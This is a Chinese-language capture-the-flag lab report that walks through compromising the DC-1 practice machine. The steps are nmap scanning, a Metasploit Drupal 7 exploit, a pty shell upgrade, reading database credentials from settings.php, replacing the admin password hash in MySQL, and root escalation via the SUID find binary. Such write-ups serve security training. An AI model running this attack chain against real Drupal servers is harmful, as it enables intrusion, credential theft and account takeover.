DC-1靶场实验报告

DC-1靶场实验演示

步骤一、打虚拟机，打开DC-1和kill，之后直接输入arp-scan -l来查看网段内的所有主机，以此可以得到DC-1，的IP地址为：192.168.132.130

步骤二、寻找靶场的真实IP，用：

  nmap -sP 1xx.xxx.xxx.xxx/24

-sP：扫描目标存活主机主机

步骤三、信息收集：探测端口以及服务

使用nmap对DC-1进行扫描

  nmap -A -P- -v 192.168.132.130

-A：综合性扫描

-p-：代表的是指扫描全部端口

-v：冗余信息（他能给出扫描过程中的详细信息）

步骤四：访问wed站点

步骤五：发现是一个电信的drupal服务，根据nmap结果可知当前运行的是Drupal 7的CMS

searchsploit  drupal 7

步骤六：利用MSF进行渗透

msfconsole 进入MSF控制台

search 搜索相应模块

use            对应模块

show options   查看信息

set RHOST   远程主机ip

run            攻击

我们先进入MSF控制台搜索drupal模块，然后再进入MSF去控制台msfdb run，再去搜索drupal模块search drupal进行扫描

Search Drupal

步骤七：选择相应的模块，进行测试

use 1

步骤八：设置靶场IP运行msf

set rhosts 192.168.132.130

run

步骤九：开始执行whoami命令，输入shell，

发现www-data权限

步骤十：直接进入home目录，发现flag4.txt文件，这时提示：需要提升权限

步骤十一：这时使用python反弹一个交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

这样就显示了当前路径

步骤十二：发现flag1文件

cd /var/www

Ls

cat flag1.txt

查看www目录下文件，发现flag1.txt文件，打开之后发现提示信息，在内容提示寻找站点的配置文

件

步骤十三：发现flag2，Drupal的默认配置文件为cat/var/www/sites/default/settings.php ：查看文件内容cat/var/www/sites/default/settings.php：发现了flag2和数据库的账号密码，flag2提示，需提升权限为root来查看敏感文件

我们先进入数据库查看：

'username' => 'dbuser',

'password' => 'R0ck3t',

mysql -u dbuser -p

  查看数据库，切换到drupaldb数据库，

show databases;

use drupaldb

show tables;

步骤十四：查找默认的Drupal user 表

select * from users;

发现admin信息

解决方法：置换drupal密码

步骤十五：进入www目录

quit;

php scripts/password-hash.sh 新密码

然后在进入数据库中把密码字段进行替换
进入mysql，输入密码，切换到drupaldb数据库

mysql -u dbuser -pR0ck3t

use drupaldb

将pass字段进行替换

update users set pass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw" where name="admin";

步骤十六：登录站点

 访问站点, 进行登录，密码是之前我们自己替换的，账号是admin

账号：admin

密码：123           成功登录

步骤十七：使用命令查看 suid 权限的可执行二进制程序

find / -perm -4000 2>/dev/null，发现find命令

使用命令测试，发现为root权限

touch 123

ls

find / -name 123 -exec "whoami" \;

步骤十八：发现最后的flag文件

我们切换语句进入shell，输入whoami查看当前权限，输入ls查看当前目录下文件，切换到root目录，查看文件，发现cat thefinalflag.txt文件。

find ./ -name 666 -exec "/bin/sh" \;   

whoami

ls

cd /root

Ls      查看cat thefinalflag.txt，文件cat thefinalflag.txt